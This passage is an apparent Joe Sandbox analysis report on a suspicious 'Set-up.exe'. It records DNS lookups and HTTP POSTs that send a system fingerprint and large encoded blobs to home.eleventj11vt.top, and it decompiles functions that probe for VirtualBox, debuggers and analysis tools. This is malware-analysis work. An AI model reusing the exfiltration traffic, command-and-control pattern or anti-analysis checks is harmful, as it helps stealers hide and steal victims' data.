Dec 31, 2024 16:47:44.926203012 CET	192.168.2.4	1.1.1.1	0x8532	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false
Dec 31, 2024 16:47:46.452112913 CET	192.168.2.4	1.1.1.1	0xd040	Standard query (0)	home.eleventj11vt.top	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:47:46.452152014 CET	192.168.2.4	1.1.1.1	0xc0d4	Standard query (0)	home.eleventj11vt.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 16:47:27.233774900 CET	1.1.1.1	192.168.2.4	0xab1c	No error (0)	httpbin.org	34.200.57.114	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:47:27.233774900 CET	1.1.1.1	192.168.2.4	0xab1c	No error (0)	httpbin.org	34.197.122.172	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:47:41.513448000 CET	1.1.1.1	192.168.2.4	0x478d	No error (0)	home.eleventj11vt.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:47:45.807375908 CET	1.1.1.1	192.168.2.4	0x4883	No error (0)	home.eleventj11vt.top	34.147.147.173	A (IP address)	IN (0x0001)	false
Dec 31, 2024 16:47:47.111725092 CET	1.1.1.1	192.168.2.4	0xd040	No error (0)	home.eleventj11vt.top	34.147.147.173	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

home.eleventj11vt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	34.147.147.173	80	6276	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 16:47:41.851106882 CET	12360	OUT	POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1 Host: home.eleventj11vt.top Accept: / Content-Type: application/json Content-Length: 559845 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 38 38 36 35 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317488654", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
Dec 31, 2024 16:47:41.856066942 CET	4944	OUT	Data Raw: 55 36 63 59 65 38 66 6b 48 69 39 39 47 58 78 76 38 41 41 62 4c 38 6e 7a 58 78 58 34 4a 5c 2f 31 56 77 47 66 59 32 76 6c 32 55 34 6a 5c 2f 57 54 68 48 50 50 72 65 4d 77 31 42 59 6d 76 52 39 6e 77 33 6e 32 63 56 71 48 4a 51 6b 70 38 2b 4a 70 30 61 Data Ascii: U6cYe8fkHi99GXxv8AAbL8nzXxX4J\/1VwGfY2vl2U4j\/WThHPPreMw1BYmvR9nw3n2cVqHJQkp8+Jp0aUvhhOU04nB0U9lxyOn8qZX9EH4OFFFFBpT6\/L9SF4+Q\/v\/AJ\/X\/Po2rFfsH\/wTG\/Yl+CH7Wvg\/4ran8WIvFgvvBPiPw3YaRP4X8QroxktNb03Uri4ivo57DUoZvJm0xGtniit5F+0XCzvOvkLB+f8AiZ4
Dec 31, 2024 16:47:41.856087923 CET	2472	OUT	Data Raw: 47 31 5c 2f 6e 5c 2f 53 67 30 70 39 66 6b 51 74 73 2b 54 5a 35 6d 7a 7a 66 4b 2b 7a 5c 2f 41 50 4c 66 42 5c 2f 7a 36 38 39 38 30 66 36 76 59 6d 5c 2f 38 41 31 63 56 78 4c 5c 2f 6e 36 59 5c 2f 54 74 30 70 5c 2f 7a 2b 59 5c 2f 5c 2f 41 43 7a 53 51 Data Ascii: G1\/n\/Sg0p9fkQts+TZ5mzzfK+z\/APLfB\/z68980f6vYm\/8A1cVxL\/n6Y\/Tt0p\/z+Y\/\/ACzSQ9Y\/8KH\/ALqfO\/Mv+tEH8vf60GhWQeXI+xDvPYfZeftnP+f8mjP7ze6SI+bfzbj\/AJYY7\/1\/zxRtR9+xPkt\/+mXn83nI\/wA\/jT5N\/Dv5ieXF\/q45f9T\/AJ\/zmgBjL+7fy3\/1cRl8v\/nt\/iP\/A
Dec 31, 2024 16:47:41.856112003 CET	2472	OUT	Data Raw: 70 55 71 53 6c 48 4b 38 76 70 56 55 34 75 62 64 6f 4a 35 6e 4b 45 56 47 30 55 34 75 4b 53 35 62 48 38 49 5c 2f 54 52 78 32 47 68 78 64 77 5a 77 37 68 4b 4e 43 68 52 79 6a 68 72 45 5a 6a 37 4c 44 30 71 64 4b 45 4a 35 7a 6d 64 61 67 31 4a 55 34 78 Data Ascii: pUqSlHK8vpVU4ubdoJ5nKEVG0U4uKS5bH8I\/TRx2GhxdwZw7hKNChRyjhrEZj7LD0qdKEJ5zmdag1JU4xvUlHJ4Tk53m1OMm3zJkP7v\/OajqdlTt0\/L\/D+VLX9SH8Ykfl+\/wCn\/wBenfP\/ALP606igD+3i7t7S9tpbO\/toryzuQEntp13RyAkYbgho5EOHimjZZYZArxurAGvmG5ig0\/XNY0+2LC3sNX1Kzt\/Mbc4
Dec 31, 2024 16:47:41.856192112 CET	4944	OUT	Data Raw: 31 59 47 30 76 66 44 56 6a 64 58 56 71 6a 61 6e 6f 4d 6c 33 48 70 2b 6f 54 32 48 7a 6e 2b 30 68 5c 2f 77 55 5c 2f 77 44 69 7a 34 4e 2b 4f 5c 2f 78 4f 2b 42 5c 2f 37 4c 33 37 4d 6c 37 38 64 6e 2b 41 6d 67 5c 2f 32 33 38 59 66 45 6b 6d 70 61 6a 5a Data Ascii: 1YG0vfDVjdXVqjanoMl3Hp+oT2Hzn+0h\/wU\/wDiz4N+O\/xO+B\/7L37Ml78dn+Amg\/238YfEkmpajZ2mjx29pb3upWuladpVlNKtvo8U62c15c3Et5f6pBqNtp+iS2um\/bLzC+Jd98af+CoH7MHhL4u\/Ab446p+z98L\/APhA\/iNeePvhXp1lOPGmt\/GbwWZz4d8O3fxB0690ppvAUuoW6y3EsCaWosBZaje6Lquoan
Dec 31, 2024 16:47:41.856237888 CET	4944	OUT	Data Raw: 2f 72 6f 33 33 5c 2f 63 6a 5c 2f 41 48 70 5c 2f 70 5c 2f 6e 38 36 72 4c 4c 35 6a 50 38 33 6c 70 48 5c 2f 77 41 74 50 4e 5c 2f 31 5c 2f 77 44 6e 76 7a 78 55 30 6e 6d 52 5c 2f 4a 5c 2f 7a 37 34 6d 69 38 76 6d 66 50 2b 65 76 65 6d 53 62 39 7a 76 5c Data Ascii: /ro33\/cj\/AHp\/p\/n86rLL5jP83lpH\/wAtPN\/1\/wDnvzxU0nmR\/J\/z74mi8vmfP+evemSb9zv\/AB5EWI5v9Tz6UAM\/eeZN+5+T\/llx58H+e3v60Lskjf8Ahf8A0fyv3v7ib8\/+X4\/07dppJPlx9xPNx\/037f6L24\/zimSN\/fTf\/wAtv3f\/ACx\/\/XU+185f18zoIW+6+\/5E\/wCuX7\/\/AD9T+tM8z
Dec 31, 2024 16:47:41.856281042 CET	2472	OUT	Data Raw: 56 70 33 48 6a 54 5c 2f 68 57 50 5c 2f 42 4b 72 39 67 4b 58 34 5a 36 50 34 6a 6e 38 56 2b 4f 62 5c 2f 52 5c 2f 45 5c 2f 68 7a 34 64 32 56 7a 62 4a 5c 2f 77 6b 76 78 54 2b 4d 66 6a 6b 54 6f 62 72 53 5c 2f 44 4e 73 39 35 49 6d 6a 36 58 71 47 70 32 Data Ascii: Vp3HjT\/hWP\/BKr9gKX4Z6P4jn8V+Ob\/R\/E\/hz4d2VzbJ\/wkvxT+MfjkTobrS\/DNs95Imj6XqGp2t5eWUL3a6Z4e0+00+a+1DWr2zbVKmlf8E8v2mfhlbDwx8Av+Ckvxl8B\/DeyCw6D4Q+IHw28L\/GS90CxhytrpumeINY8SeHUs9NtIiIobDTtF0+0VVUrCu0V6p8CP+Cdngr4cfEq0+O\/xo+J\/wAQv2pvj1pqom
Dec 31, 2024 16:47:41.860696077 CET	2472	OUT	Data Raw: 6a 5c 2f 6e 69 6d 66 78 70 39 54 55 73 6e 62 38 66 36 56 48 51 64 6c 50 72 38 69 48 35 6d 39 54 5c 2f 41 43 5c 2f 77 7a 55 62 52 70 37 68 4f 6e 2b 63 5c 2f 35 36 56 61 71 4f 54 74 2b 50 38 41 53 67 63 4e 76 6e 2b 69 4b 63 6b 58 39 77 65 76 62 2b Data Ascii: j\/nimfxp9TUsnb8f6VHQdlPr8iH5m9T\/AC\/wzUbRp7hOn+c\/56VaqOTt+P8ASgcNvn+iKckX9wevb+g\/x9earSK6Mf4\/1\/yfQ9fWr8n+5\/P\/APX6+gFM\/h+5H\/nn6fhjPt3oN\/aeX4\/8AofP\/wAtOnf+nv6UwN8r4\/66\/wCe\/TJqzJH9z\/PX+pPv0qskeI97\/Pz\/AJ\/+tQdFPr8v1IfM6\/x\/pn2p
Dec 31, 2024 16:47:41.861584902 CET	4944	OUT	Data Raw: 76 5c 2f 41 50 71 37 56 70 37 54 79 5c 2f 48 5c 2f 41 49 41 44 5a 4d 65 58 76 33 79 4f 5c 2f 6d 5c 2f 36 75 53 58 39 78 30 35 5c 2f 2b 75 50 58 39 55 50 6c 2b 5a 5c 2f 66 5c 2f 77 43 32 58 2b 70 34 5c 2f 77 41 5c 2f 6d 61 65 76 2b 35 4a 37 2b 5a Data Ascii: v\/APq7Vp7Ty\/H\/AIADZMeXv3yO\/m\/6uSX9x05\/+uPX9UPl+Z\/f\/wC2X+p4\/wA\/maev+5J7+Z+4\/wA8H25o+WRpndN7+b+6\/wA9v88CszoGeW6+d\/fj\/wCmX6\/1okaZZEh\/g\/5+P64FCR7t+xy\/\/bX2\/XOabt+ZHSHA\/wBVL5n+fyrT2nl+P\/AAhj\/eSeXsjmSP7RL5p\/ced3\/xzT5M\/u9\/3P
Dec 31, 2024 16:47:41.861615896 CET	7416	OUT	Data Raw: 38 41 44 38 4d 76 67 4f 50 72 6f 6e 78 46 50 38 76 69 57 74 66 6d 33 2b 30 48 38 63 66 46 48 37 52 33 78 61 38 54 66 47 4c 78 6a 70 2b 67 61 4a 34 6b 38 56 51 36 44 44 71 47 6e 2b 47 49 4e 52 74 74 44 67 58 77 39 34 65 30 72 77 7a 5a 47 78 67 31 Data Ascii: 8AD8MvgOPronxFP8viWtfm3+0H8cfFH7R3xa8TfGLxjp+gaJ4k8VQ6DDqGn+GINRttDgXw94e0rwzZGxg1bUtY1GPzdP0e1luftGpXW+8e4liMMLx28XnWp+DfEGhfEg\/CrxBrXw38O+KtR\/aZ0L9k3wJ\/bPibxZBp\/wAVfizqHifRvC3iY\/Do2nw7vdW1Pwf8NbrX9Ju\/H\/i\/XNH8O6Tpq3tvoekya14zuLbwtPteC
Dec 31, 2024 16:47:41.861628056 CET	2472	OUT	Data Raw: 68 4a 48 38 72 76 48 44 38 6e 2b 74 38 75 54 5c 2f 58 5c 2f 5a 5c 2f 77 44 6c 30 47 66 7a 48 35 56 43 5c 2f 77 41 75 7a 5a 5c 2f 79 30 5c 2f 64 53 39 65 66 2b 6e 72 36 2b 6e 2b 46 48 79 46 66 75 62 49 66 4b 38 71 4b 53 4f 58 5c 2f 55 5c 2f 77 43 Data Ascii: hJH8rvHD8n+t8uT\/X\/Z\/wDl0GfzH5VC\/wAuzZ\/y0\/dS9ef+nr6+n+FHyFfubIfK8qKSOX\/U\/wCl8\/5z61N++CQp997jv\/z17\/5\/xoAZHJtaPYnmv\/zz69f8\/XNQrvjjd3+fp5v7rp6Wv+fahm\/ef3f+2R8+bt7\/AEPr+FG52idETfJ\/y1\/69\/f\/AD3rT2fn+H\/BNvf\/ALv4h5ch6\/f\/AOen4f8A
Dec 31, 2024 16:47:44.915911913 CET	138	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Tue, 31 Dec 2024 15:47:44 GMT content-type: text/html; charset=utf-8 content-length: 1 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	34.147.147.173	80	6276	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 16:47:45.816412926 CET	101	OUT	GET /olNuzJxAApOsKhOXzdRo1735639435?argument=0 HTTP/1.1 Host: home.eleventj11vt.top Accept: /
Dec 31, 2024 16:47:46.445859909 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Tue, 31 Dec 2024 15:47:46 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	34.147.147.173	80	6276	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 16:47:47.117332935 CET	174	OUT	POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1 Host: home.eleventj11vt.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 31, 2024 16:47:47.812144041 CET	353	IN	HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Tue, 31 Dec 2024 15:47:47 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	34.200.57.114	443	6276	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:47:27 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-31 15:47:28 UTC	224	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 15:47:28 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-31 15:47:28 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	10:47:25
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0xdc0000
File size:	7'793'288 bytes
MD5 hash:	3D060EC62AD0864CFD0D40F46A4F07A9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31.4%
Total number of Nodes:	1386
Total number of Limit Nodes:	83

Executed Functions

Function 00DFA550 Relevance: 67.3, APIs: 23, Strings: 15, Instructions: 777networkstringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DDD8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00DD01B1), ref: 00DDD8E2

setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 00DFA670
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DFA6A1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DFA6AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DFA6AF

Part of subcall function 00DDD090: GetLastError.KERNEL32 ref: 00DDD0A1
Part of subcall function 00DDD090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD0A9
Part of subcall function 00DDD090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD0CD
Part of subcall function 00DDD090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD0D7
Part of subcall function 00DDD090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00DDD381
Part of subcall function 00DDD090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00DDD3A2
Part of subcall function 00DDD090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD3BF
Part of subcall function 00DDD090: GetLastError.KERNEL32 ref: 00DDD3C9
Part of subcall function 00DDD090: SetLastError.KERNEL32(00000000), ref: 00DDD3D4

Part of subcall function 00E04F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E04F9E

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00DFA831
WSAGetLastError.WS2_32 ref: 00DFA854
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00DFA97A
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 00DFA9A6
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DFAB0F
htons.WS2_32(?), ref: 00DFAC01
getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00DFAC38
setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 00DFAC64
WSAGetLastError.WS2_32 ref: 00DFACDC
WSAGetLastError.WS2_32 ref: 00DFADF5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 00DFAE9D
htons.WS2_32(?), ref: 00DFAEDB
bind.WS2_32(?,00000002,00000010), ref: 00DFAEF5
WSAGetLastError.WS2_32 ref: 00DFAFB9
htons.WS2_32(?), ref: 00DFAFFC
bind.WS2_32(?,?,?), ref: 00DFB014
WSAGetLastError.WS2_32 ref: 00DFB056
htons.WS2_32(?), ref: 00DFB0D2
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 00DFB0EA

Strings

Trying [%s]:%d..., xrefs: 00DFA689
Local Interface %s is ip %s using address family %i, xrefs: 00DFAE60
Bind to local port %d failed, trying next, xrefs: 00DFAFE5
Name '%s' family %i resolved to '%s' family %i, xrefs: 00DFADAC
Could not set TCP_NODELAY: %s, xrefs: 00DFA871
Couldn't bind to '%s' with errno %d: %s, xrefs: 00DFAE1F
@, xrefs: 00DFAC42
Trying %s:%d..., xrefs: 00DFA7C2, 00DFA7DE
cf-socket.c, xrefs: 00DFA5CD, 00DFA735
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00DFAD0A
bind failed with errno %d: %s, xrefs: 00DFB080
@, xrefs: 00DFA8F4
Local port: %hu, xrefs: 00DFAF28
cf_socket_open() -> %d, fd=%d, xrefs: 00DFA796
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00DFA6CE

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 2815861332-2373386790
Opcode ID: c7aa06bde2439556afe235d34116e69a4919795bd8c0c3388231447a45129efb
Instruction ID: 8efa96bdbe1e3f7aa609d54e62b41bdda7573569f7af57aa77218383ef87eff9
Opcode Fuzzy Hash: c7aa06bde2439556afe235d34116e69a4919795bd8c0c3388231447a45129efb
Instruction Fuzzy Hash: 9462F3B1504345ABE7208F18C845BBAB7F5EF84314F09852DFA8C97292E771E945CBA3

Function 00DC29FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00DC2A27
RegOpenKeyExA.KERNELBASE ref: 00DC2A8A
CharUpperA.USER32 ref: 00DC2AEF
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC2B05
CreateToolhelp32Snapshot.KERNEL32 ref: 00DC2B6D
Process32First.KERNEL32 ref: 00DC2B88
Process32Next.KERNEL32 ref: 00DC2BC0
QueryFullProcessImageNameA.KERNELBASE ref: 00DC2C26
CloseHandle.KERNELBASE ref: 00DC2C49
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC2C5F
CreateToolhelp32Snapshot.KERNEL32 ref: 00DC2CC4
Process32First.KERNEL32 ref: 00DC2CDF
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00DC2D0D
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC2D42
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC2D5C
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC2D76
strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00DC2D90
Process32Next.KERNEL32 ref: 00DC2DBF
CloseHandle.KERNELBASE ref: 00DC2DFC
EnumWindows.USER32 ref: 00DC2E21

Strings

SYSTEM\ControlSet001\Services\VBoxSF, xrefs: 00DC2A76
x64dbg.exe, xrefs: 00DC2D65
procmon.exe, xrefs: 00DC2D4B
ida.exe, xrefs: 00DC2D7F
vbox_second, xrefs: 00DC2AAB
dbg_third, xrefs: 00DC2E48
public_check, xrefs: 00DC2B26
vbox_first, xrefs: 00DC2A49
C:\USERS\PUBLIC\, xrefs: 00DC2AF4
yadro, xrefs: 00DC2EFB
C:\Windows\System32\VBox*.dll, xrefs: 00DC2A1B
wireshark.exe, xrefs: 00DC2D31
dbg, xrefs: 00DC2C80
dbg_sec, xrefs: 00DC2DDE
0, xrefs: 00DC2DA9
WINDBG.EXE, xrefs: 00DC2C4E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
API String ID: 515599682-3783588604
